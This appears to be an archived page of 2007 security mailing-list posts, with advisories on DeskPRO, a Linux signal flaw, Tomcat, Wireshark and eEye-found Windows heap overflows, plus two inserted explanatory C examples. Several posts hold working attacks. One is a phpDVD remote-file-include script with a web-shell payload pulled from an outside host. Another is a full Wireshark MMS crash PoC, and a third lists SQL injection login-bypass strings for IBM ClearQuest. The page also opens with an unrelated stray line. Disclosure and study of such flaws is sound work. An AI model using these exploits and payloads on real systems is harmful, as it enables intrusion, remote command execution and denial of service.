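The point of the check function is not to sanitise: it shows that a URI can legitimately contain shell-active characters, so the only robust handoff is one where the shell is never in the path.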

Re: phpDVD v1.0.4 (dvd_config_file) Remote File Include Exploit

2007-08-14 Thread BlackHawk
FAKE!! I think that this guy just takes some exploits from the web,
modifies them a little and then re-posts them..

index.php, first 2 lines:

<?
$dvd_config_file = "config.php";  // Full path and name of the config file


so, where is the RFI?
But it is obvious that you do not understand anything of this; let's take
a look at your exploit:

$packet ="GET ".$p."index.php?dvd_config_file=".$shell."?cmd=".$cmd."%00 HTTP/1.0\r\n";

I do not think that:
1 - it will work with 2 '?' in the URL
2 - you know why rgod or someone else put %00 at the end of the
URL..

hope to never see your nick again


Saturday, August 11, 2007, 5:04:36 PM, you wrote:

 #!/usr/bin/php -q -d short_open_tag=on
 <?
 print '

 //'===
 //'[Script   : phpDVD v1.0.4
 //'[Author  : iLker Kandemir ilkerkandemir[at]mynet.com
 //'[S.Page : http://ugo.scarlata.it/phpdvd/phpDVD-1.0.4.tar.gz
 //'[Dork: phpDVD v1.0.4
 //'===

 //'[[Code]]--
 //'
 //'  require($dvd_config_file);
 //'
 //'[[Code]]-

 ';

 if ($argc<4) {
 print ('
 -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
 Usage: php '.$argv[0].' host shell cmd OPTIONS
 host:  script server (ip/hostname)
 shell: path to shell
 cmd:   a shell command (ls -la)
 Options:
 -p[port]:specify a port other than 80
 -P[ip:port]: specify a proxy
 Example:
 php '.$argv[0].' localhost http://www.site.com/shell.txt ls -la -P1.1.1.1:80
 shell.txt: <?php ob_clean();echo "iLker Kandemir
 www.mefistolabs.com";ini_set("max_execution_time",0);echo
 "mefistolabs";passthru($_GET["cmd"]);die;?>
 -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
 ');
 die;
 }

 error_reporting(0);
 ini_set("max_execution_time",0);
 ini_set("default_socket_timeout",5);

 function quick_dump($string)
 {
   $result='';$exa='';$cont=0;
   for ($i=0; $i<=strlen($string)-1; $i++)
   {
     if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
     {$result.="  .";}
     else
     {$result.="  ".$string[$i];}
     if (strlen(dechex(ord($string[$i])))==2)
     {$exa.=" ".dechex(ord($string[$i]));}
     else
     {$exa.=" 0".dechex(ord($string[$i]));}
     $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
   }
   return $exa."\r\n".$result;
 }
 $proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
 function sendpackets($packet)
 {
   global $proxy, $host, $port, $html, $proxy_regex;
   if ($proxy=='') {
     $ock=fsockopen(gethostbyname($host),$port);
     if (!$ock) {
       echo 'No response from '.$host.':'.$port; die;
     }
   }
   else {
     $c = preg_match($proxy_regex,$proxy);
     if (!$c) {
       echo 'Not a valid proxy...';die;
     }
     $parts=explode(':',$proxy);
     echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
     $ock=fsockopen($parts[0],$parts[1]);
     if (!$ock) {
       echo 'No response from proxy...';die;
     }
   }
   fputs($ock,$packet);
   if ($proxy=='') {
     $html='';
     while (!feof($ock)) {
       $html.=fgets($ock);
     }
   }
   else {
     $html='';
     while ((!feof($ock)) or
     (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
       $html.=fread($ock,1);
     }
   }
   fclose($ock);
   #debug
   #echo "\r\n".$html;
 }
 function make_seed()
 {
   list($usec, $sec) = explode(' ', microtime());
   return (float) $sec + ((float) $usec * 10);
 }

 $host=$argv[1];
 $shell=$argv[2];
 $cmd="";

 $port=80;
 $proxy="";
 for ($i=3; $i<$argc; $i++){
   $temp=$argv[$i][0].$argv[$i][1];
   if (($temp<>"-p") and ($temp<>"-P")) {$cmd.=" ".$argv[$i];}
   if ($temp=="-p")
   {
     $port=str_replace("-p","",$argv[$i]);
   }
   if ($temp=="-P")
   {
     $proxy=str_replace("-P","",$argv[$i]);
   }
 }

 if ($proxy=='') {$p='http://'.$host.':'.$port;}

 $packet ="GET ".$p."index.php?dvd_config_file=".$shell."?cmd=".$cmd."%00 HTTP/1.0\r\n";
 $packet.="Host: ".$host."\r\n";
 $packet.="Connection: Close\r\n\r\n";
 sendpackets($packet);
 if (strstr($html,"mefistolabs"))
 {
   $temp=explode("mefistolabs",$html);
   die($temp[1]);
 }
 echo "Exploit ERROR";
 echo "www.mefistolabs.com";
 ?>
 # MefistoLabs.Com

-- 
Best regards,
 BlackHawkmailto:[EMAIL PROTECTED]



DeskPRO Admin Panel Multiple HTML Injections

2007-08-14 Thread DoZ
 [HSC] DeskPRO Admin Panel Multiple HTML Injections



An attacker may leverage this issue to have arbitrary script code executed
in the browser of an unsuspecting user in the context of the affected site.
This may help the attacker steal cookie-based authentication credentials and
launch other attacks. A successful exploit could allow an attacker to compromise
the application, access or modify data, or exploit vulnerabilities in the
underlying database implementation. The interesting vulnerability in
ticket_escalate.php is that, from the user side, HTML injection is shown in
the Admin CP at admin/ticket_escalate.php. Such attacks can be crafted where
the attacker may inject code that will send the admin's cookies to a remote
attacker when the admin goes to view ticket_escalate.php. We also see that in
/admincp/techs.php, if the attacker injects code into the submit form,
techs.php is affected in the Admin Control Panel. Also, when we set a workflow
in ticket_rules_web.php with HTML injection, we get an injection result. Then
there is /admincp/user_help.php?do=new_entry; this simply allows one to inject
any code into the PHP file.


Hackers Center Security Group (http://www.hackerscenter.com)
Credit: Doz

Class: Input Validation Error
Priority: Medium

Remote: N/A
Local: Yes



Vendor: Headstart Solutions Limited

Web Site: http://www.deskpro.com/


DeskPRO v3.0.2 * Beta and prior versions may be affected!



* Exploit is not needed, Attackers can exploit these issues via a web client.

Vulnerable URLs:


/admincp/ticket_category.php

/admincp/ticket_priority.php

/admincp/ticket_workflow.php

/admincp/ticket_escalate.php

/admincp/fields_ticket.php

/admincp/ticket_rules_web.php

admincp/ticket_displayfields.php

/admincp/ticket_rules_mail.php

/admincp/fields_user.php

/admincp/fields_faq.php

/admincp/user_help.php


Only by becoming an Ethical Hacker can you stop a Hacker. Learn Security without
having to pay thousands! - http://kit.hackerscenter.com - The most comprehensive
security pack you will ever find on the net!


COSEINC Linux Advisory #1: Linux Kernel Parent Process Death Signal Vulnerability

2007-08-14 Thread Wojciech Purczynski

===[ ABSTRACT ]=

An unprivileged local user may send an arbitrary signal to a child process
despite security restrictions.


===[ AFFECTED SOFTWARE ]

Linux 2.6
Linux 2.4

For the exact kernel version please refer to the information provided by
your vendor.


===[ DESCRIPTION ]==

Typically an unprivileged user cannot send signals to processes running
with a different UID. Due to a vulnerability found in the Linux kernel, any
local user may bypass security restrictions and send an arbitrary signal to
any child process executed by the user.

When a parent process dies or exits its child processes may receive a
signal.  Each child process may choose and set its own parent process
death signal using the PR_SET_PDEATHSIG function of the prctl() system
call.

PARENT                          CHILD

fork()
                                prctl(PR_SET_PDEATHSIG)
exit()'ed or killed
                                child receives the signal

The parent process death signal is not reset over the execve() system call
and is inherited by the spawned process:

PARENT                          CHILD

fork()
                                prctl(PR_SET_PDEATHSIG)
                                execve(./a.out)
exit()'ed or killed
                                child receives the signal

The signal gets delivered only if the parent process has sufficient
privileges to send signals to child processes. Typically any child
process running with higher privilege than its parent will receive no
signal.

PARENT                          CHILD

fork()
                                prctl(PR_SET_PDEATHSIG)
                                execve(/bin/setuid-binary)
exit()'ed or killed
                                child receives NO signal this time

However, the above restriction may be bypassed if the parent process
executes a setuid-root binary which dies afterwards.

PARENT                          CHILD

fork()
                                prctl(PR_SET_PDEATHSIG)
                                execve(/bin/setuid-binary)
execve(/bin/setuid-binary)
exit()'ed or killed
                                privileged process receives the signal


===[ DISCLOSURE TIMELINE ]==

27th July 2007  Vendor notification
14th August 2007Public disclosure


===[ AUTHOR ]===

Wojciech Purczynski [EMAIL PROTECTED]

Wojciech Purczynski is a Security Researcher at Vulnerability Research
Labs, COSEINC PTE Ltd. Wojciech Purczynski is also a member of iSEC
Security Research.


===[ LEGAL DISCLAIMER ]=

Copyright (c) 2006,2007 Wojciech Purczynski
Copyright (c) 2007 COSEINC PTE Ltd.

All Rights Reserved.

PUBLISHING, DISTRIBUTING, PRINTING, COPYING, SCANNING, DUPLICATING IN
ANY FORM, MODIFYING WITHOUT PRIOR WRITTEN PERMISSION IS STRICTLY
PROHIBITED.

THE DOCUMENT IS PROVIDED AS IS WITHOUT WARRANTY OF ANY KIND. THE
CONTENT MAY CHANGE WITHOUT NOTICE. IN NO EVENT SHALL THE AUTHORS BE
LIABLE FOR ANY SPECIAL, INDIRECT OR CONSEQUENTIAL DAMAGES, INJURIES,
LOSSES OR UNLAWFUL OFFENCES.

USE AT YOUR OWN RISK.
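
The mechanism the advisory's first diagram describes (child arms PR_SET_PDEATHSIG, parent exits, child receives the signal) is reproducible on an ordinary Linux box, and so is the defensive counterpart the advisory implies: a program that may have inherited a death signal across execve() can drop it by setting the signal to 0. The following is an added example written for this page, not code from the COSEINC advisory. It assumes Linux (sys/prctl.h); the functions pdeathsig_delivered and child_body are this example's own, and it uses a three-level fork so the "parent" that dies is not the test process itself.

```c
#define _GNU_SOURCE
#include <signal.h>
#include <stdio.h>
#include <sys/prctl.h>
#include <sys/wait.h>
#include <time.h>
#include <unistd.h>

/*
 * Child side: arm the parent-death signal (and optionally disarm it again),
 * tell the parent we are ready, then report through result_fd whether the
 * signal arrived after the parent died: 'S' = signal received, 'N' = none.
 */
static void child_body(int ready_fd, int result_fd, int clear_again)
{
    sigset_t set;
    pid_t parent = getppid();
    struct timespec grace = { 0, 300 * 1000 * 1000 };   /* 300 ms */
    char verdict = 'N';

    /* Keep SIGUSR1 blocked so it stays pending and can be collected
       synchronously with sigtimedwait() instead of through a handler. */
    sigemptyset(&set);
    sigaddset(&set, SIGUSR1);
    sigprocmask(SIG_BLOCK, &set, NULL);

    /* Ask the kernel to send us SIGUSR1 when our parent dies. */
    if (prctl(PR_SET_PDEATHSIG, SIGUSR1) != 0)
        _exit(1);
    /* Defensive counterpart: a program that may have inherited a death
       signal across execve() can drop it by setting the signal to 0. */
    if (clear_again && prctl(PR_SET_PDEATHSIG, 0) != 0)
        _exit(1);

    if (write(ready_fd, "R", 1) != 1)       /* the parent exits after this */
        _exit(1);

    /* Being reparented means the original parent is gone. */
    while (getppid() == parent)
        usleep(10 * 1000);

    /* Collect the pending death signal, if any, within the grace period. */
    if (sigtimedwait(&set, NULL, &grace) == SIGUSR1)
        verdict = 'S';

    if (write(result_fd, &verdict, 1) != 1)
        _exit(1);
    _exit(0);
}

/*
 * Fork an intermediate parent that forks the child, waits for it to arm
 * PR_SET_PDEATHSIG, and then exits.  Returns 1 if the child received its
 * death signal, 0 if it did not, -1 on setup failure.
 */
int pdeathsig_delivered(int clear_again)
{
    int ready[2], result[2];
    pid_t mid;
    char buf = 0;

    if (pipe(ready) != 0 || pipe(result) != 0)
        return -1;

    mid = fork();
    if (mid < 0)
        return -1;
    if (mid == 0) {
        pid_t child = fork();
        if (child == 0)
            child_body(ready[1], result[1], clear_again);
        if (child < 0)
            _exit(1);
        close(ready[1]);                    /* only the child writes here */
        if (read(ready[0], &buf, 1) < 0)    /* wait until the child is armed */
            _exit(1);
        _exit(0);                           /* this death triggers the signal */
    }

    close(ready[0]);
    close(ready[1]);
    close(result[1]);
    waitpid(mid, NULL, 0);
    if (read(result[0], &buf, 1) != 1)
        buf = 0;
    close(result[0]);
    return buf == 0 ? -1 : (buf == 'S');
}

int main(void)
{
    printf("armed:    child %s the death signal\n",
           pdeathsig_delivered(0) == 1 ? "received" : "did not receive");
    printf("disarmed: child %s the death signal\n",
           pdeathsig_delivered(1) == 1 ? "received" : "did not receive");
    return 0;
}
```

The armed run shows the ordinary delivery path; the disarmed run shows that clearing the setting before the parent dies is enough to suppress it, which is the check a privileged program can make at startup when it cannot trust what it inherited.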


Re: CVE-2007-3382: Handling of cookies containing a ' character

2007-08-14 Thread Christopher Schultz
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Mark,

Mark Thomas wrote:
 CVE-2007-3382: Handling of cookies containing a ' character
 
 Versions Affected:
 5.5.0 to 5.5.24

Since 5.5.24 isn't yet released, will an upcoming 5.5.24 release include
a fix for this problem given:

 Mitigation:
 Upgrade to 6.0.14

?

Thanks,
- -chris

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.7 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQFGwc+29CaO5/Lv0PARAug2AJ98oeF8HRLiXIqqzDEazknml6N/pwCgiNkO
+SIMwuOKQWDG0lkT1okzO7I=
=6jSG
-END PGP SIGNATURE-


WireShark MMS Remote Denial of Service vulnerability

2007-08-14 Thread zwell
Title
=
WireShark MMS Remote Denial of Service vulnerability

Date

13 August 2007

Affected Software
=
Wireshark < 0.99.6
Maybe all version of Ethereal

Overview

An MMS message parsing flaw in Wireshark may allow a remote attacker
to crash it, causing a denial of service.

Vulnerability Description
=
MMS stands for Multimedia Messaging Service. When Wireshark parses an MMS
message whose Content-Type is application/vnd.wap.multipart.mixed and the
header length of a multipart content entry equals 0x00, it crashes.

Solution

Update to 0.99.6

PoC

//main.cpp
#include <winsock2.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#pragma comment(lib, "ws2_32")

// The MMS PDU is carried as the body of an HTTP POST so that Wireshark
// dissects it as an MMS message.
char *http =
"POST / HTTP/1.0\r\n"
"Content-Type: application/vnd.wap.mms-message\r\n";

char *hoststr = "Host: %s:%d\r\n";
char *contentlenstr = "Content-Length: %d\r\n\r\n";

unsigned char mms[] =
{
    0x8c,0x80,//X-Mms-Message-Type: m-send-req(0x80)
    0x98,0x7a,0x77,0x65,0x6c,0x6c,0x00,//X-Mms-Transaction-ID: zwell
    0x8d,0x92,//X-Mms-MMS-Version: 1.2
    0x97,0x31,0x33,0x35,0x31,0x30,0x30,0x30,0x30,0x30,0x30,0x30,0x00,//To: 13510000000
    0x84,0xa3,//Content-Type: application/vnd.wap.multipart.mixed
    //
    0x01,//multipart count
    0x0f,//HeadersLen
    0x05,//DataLen
    0x00,//headlen === If this is 0x00, then Wireshark will crash.
         //           The real value is the length of the following three lines, which is 0x0e
    ///
    0x83,0x85,//text/plain, Name parameter follows
    0x7a,0x77,0x65,0x6c,0x6c,0x2e,0x74,0x78,0x74,0x00,//Name: zwell.txt
    0x81,0xea,//Charset: utf-8
    ///
    0x7a,0x77,0x65,0x6c,0x6c,//zwell
};

SOCKET connect_to_host(char *h, int p)
{
    SOCKET sock;
    struct hostent *host;
    struct sockaddr_in saddr;

    if((host=gethostbyname(h))==NULL)
    {
        printf("resolv host %s error\n", h);
        exit(-1);
    }

    if((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==INVALID_SOCKET)
    {
        printf("create socket error\n");
        exit(-1);
    }
    memset((void *)&saddr, 0, sizeof(struct sockaddr_in));
    saddr.sin_family=AF_INET;
    saddr.sin_addr.s_addr=*((unsigned long *)host->h_addr_list[0]);
    saddr.sin_port=htons(p);
    if(connect(sock, (struct sockaddr *)&saddr, sizeof(saddr))<0)
    {
        printf("connect to host %s on port %d error\n", h, p);
        exit(-1);
    }

    return sock;
}


void socket_init()
{
    WSADATA wsaData;
    WSAStartup(MAKEWORD(2,0), &wsaData);
}


int main(int argc, char **argv)
{
    SOCKET s;
    char sendbuf[1024];
    int len = 0;

    printf("WireShark < 0.99.6 MMS protocol DOS PoC\nCoded By ZwelL\nhttp://www.nosec.org\n");
    if(argc != 3)
    {
        printf("usage : %s host port\n", argv[0]);
        exit(-1);
    }
    socket_init();
    s = connect_to_host(argv[1], atoi(argv[2]));

    // request line and headers first, then the raw MMS PDU as the body
    strcpy(&sendbuf[len], http);
    len += strlen(http);

    sprintf(&sendbuf[len], hoststr, argv[1], atoi(argv[2]));
    len = strlen(sendbuf);

    sprintf(&sendbuf[len], contentlenstr, (int)sizeof(mms));
    len = strlen(sendbuf);

    memcpy(&sendbuf[len], mms, sizeof(mms));
    len += sizeof(mms);

    send(s, sendbuf, len, 0);
    closesocket(s);
    WSACleanup();

    printf("completed!\n");

    return 0;
}
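
To make the length byte the PoC zeroes concrete, here is an added C parser for the WSP multipart body, fed with the same bytes. It is not from the PoC or from Wireshark. The sample body is reconstructed from the PoC array; the structure (uintvar entry count, HeadersLen, DataLen, a Content-Type in general form with a leading Value-length byte, then Name and Charset parameters) and the well-known codes 0x83 text/plain, 0x85 Name, 0x81 Charset and 0xea utf-8 follow the WAP WSP encoding as I know it, and only those two parameters are handled. Every length is checked against the enclosing region before it is used, so a Value-length of zero is rejected rather than trusted.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Constructed sample: the multipart body of the PoC above, starting at the WSP
 * entry count (the byte after the 0x84,0xa3 Content-Type header). */
static const uint8_t POC_BODY[] = {
    0x01,                                   /* nEntries = 1 (uintvar) */
    0x0f,                                   /* HeadersLen = 15 (uintvar) */
    0x05,                                   /* DataLen = 5 (uintvar) */
    0x0e,                                   /* Content-Type Value-length = 14; the PoC puts 0x00 here */
    0x83,                                   /*   media type 0x03|0x80 = text/plain */
    0x85, 'z','w','e','l','l','.','t','x','t', 0x00, /* Name parameter, text value */
    0x81, 0xea,                             /*   Charset parameter, 106|0x80 = utf-8 */
    'z','w','e','l','l'                     /* the 5 data bytes */
};
#define POC_VALUE_LENGTH_OFFSET 3

struct wsp_part {
    uint8_t        media_type;              /* well-known media type byte (0x80|code) */
    char           name[32];                /* Name parameter, "" if absent */
    const uint8_t *data;
    size_t         data_len;
};

/* WSP uintvar: 7 bits per byte, MSB set means another byte follows (max 5). */
static int read_uintvar(const uint8_t *p, size_t end, size_t *pos, uint32_t *out)
{
    uint32_t v = 0;
    for (int i = 0; i < 5 && *pos < end; i++) {
        uint8_t b = p[(*pos)++];
        v = (v << 7) | (b & 0x7f);
        if (!(b & 0x80)) { *out = v; return 0; }
    }
    return -1;                               /* truncated or over-long */
}

/* Parse an application/vnd.wap.multipart.* body. Returns the number of parts,
 * or -1 if any length field points outside the region that contains it. */
int wsp_parse_multipart(const uint8_t *p, size_t n, struct wsp_part *parts, size_t max_parts)
{
    size_t pos = 0;
    uint32_t count;
    if (read_uintvar(p, n, &pos, &count) || count > max_parts) return -1;

    for (uint32_t i = 0; i < count; i++) {
        uint32_t hlen, dlen;
        if (read_uintvar(p, n, &pos, &hlen) || read_uintvar(p, n, &pos, &dlen)) return -1;
        if (hlen > n - pos || dlen > n - pos - hlen) return -1;   /* whole entry must fit */
        size_t q = pos, hend = pos + hlen;
        struct wsp_part *part = &parts[i];
        memset(part, 0, sizeof *part);

        if (hlen == 0) return -1;
        uint8_t b = p[q++];
        if (b >= 0x80) {                         /* constrained: well-known media type */
            part->media_type = b;
        } else if (b >= 0x20) {                  /* constrained: text media type, not handled here */
            return -1;
        } else {                                 /* general form: Value-length Media-type *Parameter */
            uint32_t vlen = b;
            if (b == 0x1f && read_uintvar(p, hend, &q, &vlen)) return -1;
            /* This is the byte the PoC zeroes: a Value-length of 0 leaves no room
             * for a media type, and one beyond HeadersLen points past the entry. */
            if (vlen == 0 || vlen > hend - q) return -1;
            size_t vend = q + vlen;
            part->media_type = p[q++];
            if (part->media_type < 0x80) return -1;
            while (q < vend) {                   /* parameters: token then value */
                uint8_t tok = p[q++];
                if (tok == 0x85) {               /* Name: NUL-terminated text */
                    const uint8_t *nul = memchr(p + q, 0, vend - q);
                    if (!nul) return -1;
                    size_t len = (size_t)(nul - (p + q));
                    if (len >= sizeof part->name) return -1;
                    memcpy(part->name, p + q, len);
                    q += len + 1;
                } else if (tok == 0x81) {        /* Charset: one well-known byte */
                    if (q >= vend || p[q++] < 0x80) return -1;
                } else {
                    return -1;                   /* unknown parameter: refuse rather than guess */
                }
            }
        }
        pos = hend;                              /* further entry headers, if any, are skipped */
        part->data = p + pos;
        part->data_len = dlen;
        pos += dlen;
    }
    return (int)count;
}

/* 1 if the well-formed PoC body yields one text/plain part named zwell.txt carrying "zwell". */
int poc_good_body_parses(void)
{
    struct wsp_part part;
    if (wsp_parse_multipart(POC_BODY, sizeof POC_BODY, &part, 1) != 1) return 0;
    return part.media_type == 0x83 && strcmp(part.name, "zwell.txt") == 0 &&
           part.data_len == 5 && memcmp(part.data, "zwell", 5) == 0;
}

/* 1 if the PoC's zeroed Value-length byte is rejected instead of trusted. */
int poc_zero_headlen_rejected(void)
{
    uint8_t body[sizeof POC_BODY];
    struct wsp_part part;
    memcpy(body, POC_BODY, sizeof body);
    body[POC_VALUE_LENGTH_OFFSET] = 0x00;
    return wsp_parse_multipart(body, sizeof body, &part, 1) == -1;
}

int main(void)
{
    printf("well-formed body parses: %d\n", poc_good_body_parses());
    printf("zeroed length rejected : %d\n", poc_zero_headlen_rejected());
    return 0;
}
```

The point of the `vlen == 0 || vlen > hend - q` line is that the Value-length and HeadersLen describe nested regions; a dissector that trusts either one in isolation ends up reading or writing relative to the wrong end of the entry.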


IBM Rational ClearQuest Web SQL Injection Login Bypass

2007-08-14 Thread swhite
+==+
+   IBM Rational ClearQuest Web Login Bypass (SQL Injection)   +
+==+

DISCOVERED BY:
==
SecureState
  sasquatch - [EMAIL PROTECTED]
  rel1k - [EMAIL PROTECTED]

HOMEPAGE:
=
www.securestate.com


AFFECTED AREA:
===
The username field on the login page is where the application is susceptible to 
SQL injection...


SAMPLE URL:
===
http://SERVERNAMEHERE/cqweb/main?command=GenerateMainFrameratl_userdb=DATABASENAMEHERE,test=clientServerAddress=http://SERVERNAMEHERE/cqweb/loginusername='INJECTIONGOESHEREpassword=PASSWORDHEREschema=SCHEMEAHEREuserDb=DATABASENAMEHERE

Log in as admin:
==
' OR login_name LIKE '%admin%'--

(other variations work as well)
' OR login_name LIKE 'admin%'--
' OR LOWER(login_name) LIKE '%admin%'--
' OR LOWER(login_name) LIKE 'admin%'--
etc...use your imagination...

Confirmed against:
==
version 7.0.0.1Label BALTIC_PATCH.D0609.929
version 7.0.0.0-IFIX02 Label BALTIC_PATCH.D060630

The full SQL statement is echoed back in the error message:
=
SELECT
   master_users.master_dbid, master_users.login_name, 
master_users.encrypted_password,
   master_users.email, master_users.fullname, master_users.phone, 
master_users.misc_info,
   master_users.is_active, master_users.is_superuser, 
master_users.is_appbuilder,
   master_users.is_user_maint, ratl_mastership, ratl_keysite, 
master_users.ratl_priv_mask
FROM
   master_users
WHERE
   login_name = 'INJECTION GOES HERE


Re: COSEINC Linux Advisory #1: Linux Kernel Parent Process Death Signal Vulnerability

2007-08-14 Thread Dan Yefimov
On Tue, 14 Aug 2007, Wojciech Purczynski wrote:

 
 ===[ ABSTRACT ]=
 
 An unprivileged local user may send arbitrary signal to a child process
 despite security restrictions.
 
 
 ===[ AFFECTED SOFTWARE ]
 
 Linux 2.6
 Linux 2.4
 
 For the exact kernel version please refer to an information provided by
 your vendor.
 
 
 ===[ DESCRIPTION ]==
 
 Typically unprivileged user can not send signal to processes running
 with different UID. Due to vulnerability found in the Linux kernel any
 local user may bypass security restrictions and send arbitrary signal to
 any child process executed by the user.
 
 When a parent process dies or exits its child processes may receive a
 signal.  Each child process may choose and set its own parent process
 death signal using PR_SET_PDEATHSIG function of the prctl() system
 call.
 
   PARENT  CHILD
   
   fork()
   prctl(PR_SET_PDEATHSIG)
   exit()'ed or killed
   child receives the signal
 
 The parent process death signal is not reset over execve() system call
 and is inherited by spawned process:
 
   PARENT  CHILD
   
   fork()
   prctl(PR_SET_PDEATHSIG)
   execve(./a.out)
   exit()'ed or killed
   child receives the signal
 
 The signal gets delivered only if parent process has sufficient
 privileges to send signals to child processes. Typically any child
 process running with higher privilege than its parent will receive no
 signal.
 
   PARENT  CHILD
   
   fork()
   prctl(PR_SET_PDEATHSIG)
   execve(/bin/setuid-binary)
   exit()'ed or killed
   child receives NO signal this time
 
 However, above restriction may be bypassed if parent process execute
 setuid-root binary which dies afterwards.
 
   PARENT  CHILD
   
   fork()
   prctl(PR_SET_PDEATHSIG)
   execve(/bin/setuid-binary)
   execve(/bin/setuid-binary)
   exit()'ed or killed
   privileged process receives the signal
 
 
I'm not sure this is a real security issue. If some process has the same 
effective UID as the given one, the former can always send any signal to the 
latter. Thus the behaviour you described is IMHO normal. If a setuid program just 
trusts the environment, in that it doesn't properly handle or block signals 
whose default action is terminating the process and doesn't perform its
actions in a fail-safe manner, it is certainly broken. A setuid program must 
always be careful in signal handling and data processing. On the other hand, 
PDEATHSIG should always be reset on exec() like signal handlers are (I'm not 
sure though if that is directly specified by any standard). Please correct me
if I'm wrong.
-- 

Sincerely Your, Dan.



EEYE: VGX.DLL Compressed Content Heap Overflow Vulnerability

2007-08-14 Thread eEye Advisories
VGX.DLL Compressed Content Heap Overflow Vulnerability

Release Date:
August 14, 2007

Date Reported:
October 24, 2006

Severity:
High (Code Execution)

Systems Affected:
Internet Explorer 6 SP1 - Windows 2000 SP4
Internet Explorer 6 SP1 - Windows XP SP1
Internet Explorer 6 SP2 - Windows XP SP2
Internet Explorer 6 SP1 - Windows Server 2003 SP1
Internet Explorer 6 SP2 - Windows Server 2003 SP2

Overview:
eEye Digital Security has discovered a heap overflow vulnerability in
VGX.DLL's processing of compressed content referenced from VML.  VGX.DLL
is the Microsoft component responsible for rendering VML (Vector Markup
Language) within Internet Explorer.

If a user views a malicious web page or HTML e-mail containing VML that
points to compressed content on an attacker-controlled web server, the
attacker can cause a heap overflow within the viewing application,
leading to the execution of arbitrary code.

(Note that, in order to be exploited directly from HTML e-mail, the
victim must attempt to view the malicious e-mail in the Internet Zone,
or with otherwise equivalent security and privacy settings that allow
internet content to be downloaded and displayed.)

Technical Details:
VGX.DLL contains an implementation of the CDownloadSink class that
processes data downloaded from URLs embedded within VML.  For instance,
the following VML will download additional content which will be handled
by VGX.DLL!CDownloadSink::OnDataAvailable:

<v:rect>
<v:imagedata src="http://malice/compressed.emz">
</v:rect>

An integer underflow vulnerability exists within
VGX.DLL!CDownloadSink::OnDataAvailable that can eventually cause
URLMON.DLL!CMimeFt::SmartRead to overflow a heap buffer, due to a
misreported buffer size when handling compressed content.  The second
argument ([EBP+10h]; [EBP+8] is the 'this' pointer) passed into
CDownloadSink::OnDataAvailable is the total length of all raw
(compressed) data received so far, but the function will subtract the
total length of uncompressed data in its buffer from the total length of
raw data when calculating the read limit to be passed to
URLMON.DLL!CReadOnlyStreamDirect::Read.  Assuming that the data is
larger uncompressed than compressed, an integer underflow can be made to
occur, causing a very large value (roughly 4GB) to be supplied as the
read limit.  If the amount of data subsequently read exceeds the amount
of unused space in the buffer, a heap overflow with arbitrary binary
data will result.

Exploitation requires that CDownloadSink::OnDataAvailable be invoked at
least twice -- once to load the buffer with some non-zero length of
uncompressed data, and a second time to cause the overflow -- so the
compressed data must be received in distinct (e.g., time-separated)
pieces.  Since such divisions may occur legitimately, positively
identifying attempts to exploit this vulnerability is difficult, and
conversely, even legitimate web sites may cause a non-malicious heap
overflow to occur.

Internet Explorer 7 silently fixed the vulnerability roughly ten months
ago, due to a change in URLMON.DLL's behavior when reading compressed
content.

Protection:
Retina Network Security Scanner has been updated to identify this
vulnerability.
Blink Endpoint Vulnerability Prevention preemptively protects from this
vulnerability.

Vendor Status:
Microsoft has released a patch for this vulnerability.  The patch is
available at:
http://www.microsoft.com/technet/security/bulletin/MS07-050.mspx

Credit:
Discovery: Ben Nagy and Derek Soeder
Research: Derek Soeder

Related Links:
Retina - Network Security Scanner - Free Trial:
http://www.eeye.com/html/products/retina/download/index.html
Blink - Unified Client Security Personal - Free For Home Use:
http://www.eeye.com/html/products/blink/personal/download/index.html
Blink - Unified Client Security Professional - Free Trial:
http://www.eeye.com/html/products/blink/download/index.html

Greetings:
Tony B. for contributing the site.  Jennifer, Barnz, Reverse, Karl,
Dave, Steve, Glenn, Eric, Ryan, Saeed, Daniel, and Yuji.  Greg rocks!
(where were you in 2003?)  The Cygnet.

Copyright (c) 1998-2007 eEye Digital Security
Permission is hereby granted for the redistribution of this alert
electronically.  It is not to be edited in any way without express
consent of eEye.  If you wish to reprint the whole or any part of this
alert in any other medium excluding electronic medium, please email
[EMAIL PROTECTED] for permission.

Disclaimer
The information within this paper may change without notice.  Use of
this information constitutes acceptance for use in an AS IS condition.
There are no warranties, implied or express, with regard to this
information.  In no event shall the author be liable for any direct or
indirect damages whatsoever arising out of or in connection with the use
or spread of this information.  Any use of this information is at the
user's own risk.


EEYE: Windows Metafile AttemptWrite Heap Overflow

2007-08-14 Thread eEye Advisories
Windows Metafile AttemptWrite Heap Overflow

Release Date:
August 14, 2007

Date Reported:
March 27, 2007

Severity:
High (Code Execution)

Systems Affected:
Windows 2000 SP4
Windows XP SP2
Windows Server 2003 SP1

Overview:
eEye Digital Security has discovered a heap overflow vulnerability in
the way the Windows Graphical Device Interface (GDI) processes Windows
metafiles.  If an application attempts to display a malicious metafile
in a particular way, a heap overflow will occur and result in the
execution of arbitrary code, with the privileges of the user who ran the
application.

Technical Details:
The GDI32 function AttemptWrite is susceptible to a heap overflow
vulnerability caused by an integer overflow, as depicted in the
disassembly below.  The AttemptWrite function is called by multiple
GDI32 API functions, most notably CreateMetaFileW.

77F4B519  mov  esi, [ebp+0Ch]  ; reported size of record in bytes
                               ;   (user-controlled)
 ...
77F4B548  mov  eax, [ebx+0Ch]  ; amount of buffer used in bytes
                               ;   (user-controlled)
77F4B548  lea  ecx, [eax+esi]  ; *** integer overflow ***
77F4B54E  cmp  ecx, [ebx+08h]  ; buffer capacity
77F4B551  ja   _no_memcpy
 ...
